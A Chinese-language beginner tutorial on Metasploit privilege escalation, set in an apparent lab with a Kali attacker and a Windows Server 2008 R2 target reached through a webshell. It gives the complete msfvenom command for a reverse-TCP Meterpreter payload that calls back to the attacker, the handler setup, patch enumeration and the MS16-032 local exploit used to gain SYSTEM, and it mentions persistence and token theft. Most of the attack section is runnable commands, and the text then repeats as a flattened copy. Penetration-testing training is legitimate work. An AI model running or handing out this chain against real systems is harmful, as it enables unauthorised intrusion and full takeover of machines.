小白教程初学,怎么用msf,怎么提权
字数 1230 2025-08-19 12:41:11

Metasploit Framework (MSF) 提权实战教程

环境准备

攻击机配置

  • 操作系统:Kali Linux
  • IP地址:192.168.8.139

目标机配置

  • 操作系统:Windows Server 2008 R2 (英文版)
  • IP地址:192.168.8.84
  • 当前用户:普通用户abc

前期准备

已通过文件上传漏洞获取Webshell,并使用蚁剑连接,需要从普通用户提权至SYSTEM权限。

详细提权步骤

1. 生成反弹Shell可执行文件

在Kali终端执行以下命令生成反弹Shell:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.8.139 LPORT=8087 -f exe > /home/kali/Desktop/abc5.exe

参数说明:

  • -p windows/meterpreter/reverse_tcp:指定payload类型为Windows反弹TCP连接
  • LHOST:指定监听主机的IP地址(Kali的IP)
  • LPORT:指定监听端口
  • -f exe:输出格式为可执行文件

2. 上传并执行payload

将生成的abc5.exe通过蚁剑上传至目标服务器,并执行该文件。

3. 设置监听器

在Kali中启动MSF控制台:

msfconsole

配置并启动监听模块:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.8.139
set LPORT 8087
exploit

4. 获取初始Meterpreter会话

当目标执行payload后,Kali将获得Meterpreter会话。验证当前用户权限:

getuid

5. 后台运行会话

将当前会话放入后台:

background

查看活动会话:

sessions

6. 枚举系统补丁

使用补丁枚举模块识别已安装的补丁:

use post/windows/gather/enum_patches
show options
set SESSION 1  # 设置当前会话ID
run

7. 漏洞利用建议

使用本地漏洞建议模块识别可能的提权漏洞:

use post/multi/recon/local_exploit_suggester
show options
set SESSION 1
run

结果分析:

  • 绿色标记的漏洞可能有用(描述为"The target appears to be vulnerable")
  • 红色标记的漏洞通常无效
  • 重点关注描述为"The service is running, but could not be validated"的漏洞

8. 执行提权漏洞利用

选择建议的漏洞进行利用(以MS16-032为例):

use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
show options
set SESSION 1
run

验证提权结果:

getuid

成功提权后应显示"NT AUTHORITY\SYSTEM"。

关键点总结

  1. Payload生成:必须正确设置LHOST和LPORT参数
  2. 监听配置:监听器的payload类型必须与生成的payload一致
  3. 会话管理:使用background命令保持会话,sessions命令查看活动会话
  4. 补丁枚举:了解目标系统补丁状态有助于选择合适的提权漏洞
  5. 漏洞选择:优先尝试服务正在运行的漏洞利用模块
  6. 权限验证:每次操作后使用getuid验证当前权限级别

常见问题解决

  1. 监听无响应

    • 检查防火墙设置
    • 确认payload已正确上传并执行
    • 验证LHOST和LPORT设置一致
  2. 提权失败

    • 尝试其他建议的漏洞利用模块
    • 检查目标系统是否已安装相关补丁
    • 考虑使用其他提权技术(如令牌窃取、服务权限滥用等)
  3. 会话丢失

    • 确保网络连接稳定
    • 考虑使用持久化技术维持访问

通过以上步骤,可以系统性地从普通用户权限提升至SYSTEM权限,为后续渗透测试活动奠定基础。

Metasploit Framework (MSF) 提权实战教程 环境准备 攻击机配置 操作系统:Kali Linux IP地址:192.168.8.139 目标机配置 操作系统:Windows Server 2008 R2 (英文版) IP地址:192.168.8.84 当前用户:普通用户abc 前期准备 已通过文件上传漏洞获取Webshell,并使用蚁剑连接,需要从普通用户提权至SYSTEM权限。 详细提权步骤 1. 生成反弹Shell可执行文件 在Kali终端执行以下命令生成反弹Shell: 参数说明: -p windows/meterpreter/reverse_tcp :指定payload类型为Windows反弹TCP连接 LHOST :指定监听主机的IP地址(Kali的IP) LPORT :指定监听端口 -f exe :输出格式为可执行文件 2. 上传并执行payload 将生成的 abc5.exe 通过蚁剑上传至目标服务器,并执行该文件。 3. 设置监听器 在Kali中启动MSF控制台: 配置并启动监听模块: 4. 获取初始Meterpreter会话 当目标执行payload后,Kali将获得Meterpreter会话。验证当前用户权限: 5. 后台运行会话 将当前会话放入后台: 查看活动会话: 6. 枚举系统补丁 使用补丁枚举模块识别已安装的补丁: 7. 漏洞利用建议 使用本地漏洞建议模块识别可能的提权漏洞: 结果分析: 绿色标记的漏洞可能有用(描述为"The target appears to be vulnerable") 红色标记的漏洞通常无效 重点关注描述为"The service is running, but could not be validated"的漏洞 8. 执行提权漏洞利用 选择建议的漏洞进行利用(以MS16-032为例): 验证提权结果: 成功提权后应显示"NT AUTHORITY\SYSTEM"。 关键点总结 Payload生成 :必须正确设置LHOST和LPORT参数 监听配置 :监听器的payload类型必须与生成的payload一致 会话管理 :使用background命令保持会话,sessions命令查看活动会话 补丁枚举 :了解目标系统补丁状态有助于选择合适的提权漏洞 漏洞选择 :优先尝试服务正在运行的漏洞利用模块 权限验证 :每次操作后使用getuid验证当前权限级别 常见问题解决 监听无响应 : 检查防火墙设置 确认payload已正确上传并执行 验证LHOST和LPORT设置一致 提权失败 : 尝试其他建议的漏洞利用模块 检查目标系统是否已安装相关补丁 考虑使用其他提权技术(如令牌窃取、服务权限滥用等) 会话丢失 : 确保网络连接稳定 考虑使用持久化技术维持访问 通过以上步骤,可以系统性地从普通用户权限提升至SYSTEM权限,为后续渗透测试活动奠定基础。